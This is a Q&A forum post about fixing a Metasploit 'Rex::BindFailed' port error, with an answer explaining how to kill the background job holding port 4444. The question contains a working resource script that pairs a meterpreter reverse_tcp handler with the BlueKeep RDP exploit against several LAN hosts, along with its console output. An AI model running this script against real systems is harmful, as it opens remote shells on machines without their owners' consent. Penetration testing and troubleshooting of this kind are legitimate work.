# Rex::BindFailed The address is already in use or unavailable

Tags: metasploit

I'm trying to run the following script based on [this blog](https://www.pentestpartners.com/security-blog/scripting-metasploit-to-exploit-a-group-of-hosts-a-how-to/).

```
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
setg autorunscript multi_console_command -rc /root/Desktop/folder/met_cmd_file 
setg lhost 192.168.0.90    
setg lport 4444
set ExitOnSession false 
exploit -j
use exploit/windows/rdp/rdp_bluekeep
set EXITFUNC thread
exploit -j
```

However I'm getting these errors:

```
[*] Started reverse TCP handler on 192.168.0.90:4444 
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
resource (/root/Desktop/folder/con_cmd_file)> set EXITFUNC thread
EXITFUNC => thread
resource (/root/Desktop/folder/con_cmd_file)> exploit -j
[-] Exploit failed: One or more options failed to validate: RHOST.
[*] Exploit completed, but no session was created.
rhost => 192.168.0.40
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
rhost => 192.168.0.50
[-] Handler failed to bind to 192.168.0.90:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
rhost => 192.168.0.70
[-] Handler failed to bind to 192.168.0.90:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
[*] Exploit running as background job 3.
[*] Exploit completed, but no session was created.
rhost => 192.168.0.80
[*] Exploit running as background job 4.
[*] Exploit completed, but no session was created.
[-] Handler failed to bind to 192.168.0.90:4444:-  -

[-] Handler failed to bind to 0.0.0.0:4444:-  -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
[-] Handler failed to bind to 192.168.0.90:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
```

I have tried what is suggested [here](https://security.stackexchange.com/questions/207436/metasploit-starts-attacking-multiple-targets-results-in-address-is-already-in), by doing:

```
netstat -anpl | grep :4444
tcp        0      0 192.168.0.90:4444       0.0.0.0:*               LISTEN      1741/ruby
```

While running the following command I get nothing:

```
  netstat -anpl | grep :4445
```

However either I use `4444` or `4445` the result is the same.

And running `jobs` shows:

```
0   Exploit: multi/handler  windows/x64/meterpreter/reverse_tcp  tcp://192.168.0.90:4444
```

But how can I kill this job? How can this be fixed?

Answer (score 1):

> 0   Exploit: multi/handler  windows/x64/meterpreter/reverse_tcp  tcp://192.168.0.90:4444

You have an existing "job" (command running in the background) that is taking port 4444. To kill it, run `kill X`, where X is the ID of the job, in this case 0. So you'll have to run `kill 0` to stop it.

`netstat -anpl | grep :4445` didn't display any results because the port probably isn't being used. Port 4444 is the one in use.